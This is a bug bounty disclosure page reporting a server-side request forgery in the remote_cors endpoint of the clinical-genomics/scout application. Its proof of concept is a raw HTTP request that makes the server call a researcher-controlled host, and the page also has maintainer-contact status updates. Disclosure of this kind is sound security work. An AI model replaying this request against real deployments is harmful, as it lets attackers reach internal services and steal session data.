Server-Side Request Forgery in scout in clinical-genomics/scout
Valid
Reported on
May 3rd 2022
Description
Server-Side Request Forgery in remote_cors
Proof of Concept
GET /remote/cors/http://<my-vps>:8888 HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8000/cust000/cases
Cookie: <cookies>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
PoC Image
Impact
An attacker could make the application perform arbitrary requests to fishing steal cookie, request to private area, or lead to xss...
We are processing your report and will contact the
clinical-genomics/scout
team within 24 hours.
a year ago
Nhien.IT modified the report
a year ago
Nhien.IT modified the report
a year ago
Nhien.IT modified the report
a year ago
We have contacted a member of the
clinical-genomics/scout
team and are waiting to hear back
a year ago
The researcher's credibility has increased: +7
Hi @maintainer, the fix is already released, can you assign a CVE here? if you can, hope @admin help
to join this conversation